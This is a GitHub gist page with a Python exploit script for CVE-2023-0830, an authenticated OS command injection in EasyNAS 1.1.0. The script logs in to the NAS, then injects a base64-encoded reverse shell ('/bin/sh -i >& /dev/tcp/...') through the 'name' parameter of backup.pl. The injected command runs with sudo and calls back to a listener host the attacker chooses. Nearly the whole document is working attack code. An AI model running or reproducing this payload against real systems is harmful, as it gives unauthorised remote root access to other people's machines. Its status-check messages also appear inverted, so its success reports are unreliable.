EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit | |
| # Date: 2023-02-9 | |
| # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) | |
| # Author Blog: https://xbz0n.medium.com | |
| # Version: 1.1.0 | |
| # Vendor home page : https://www.easynas.org | |
| # Authentication Required: Yes | |
| # CVE : CVE-2023-0830 | |
| #!/usr/bin/python3 | |
| import requests | |
| import sys | |
| import base64 | |
| import urllib.parse | |
| import time | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| # Disable the insecure request warning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| if len(sys.argv) < 6: | |
| print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") | |
| sys.exit() | |
| url = sys.argv[1] | |
| user = sys.argv[2] | |
| password = sys.argv[3] | |
| # Create the payload | |
| payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) | |
| # Encode the payload in base64 | |
| payload = base64.b64encode(payload.encode()).decode() | |
| # URL encode the payload | |
| payload = urllib.parse.quote(payload) | |
| # Create the login data | |
| login_data = { | |
| 'usr':user, | |
| 'pwd':password, | |
| 'action':'login' | |
| } | |
| # Create a session | |
| session = requests.Session() | |
| # Send the login request | |
| print("Sending login request...") | |
| login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) | |
| # Check if the login was successful | |
| if 'Login to EasyNAS' in login_response.text: | |
| print("Unsuccessful login") | |
| sys.exit() | |
| else: | |
| print("Login successful") | |
| # send the exploit request | |
| timeout = 3 | |
| try: | |
| exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) | |
| if exploit_response.status_code != 200: | |
| print("[+] Everything seems ok, check your listener.") | |
| else: | |
| print("[-] Exploit failed, system is patched or credentials are wrong.") | |
| except requests.exceptions.ReadTimeout: | |
| print("[-] Everything seems ok, check your listener.") | |
| sys.exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment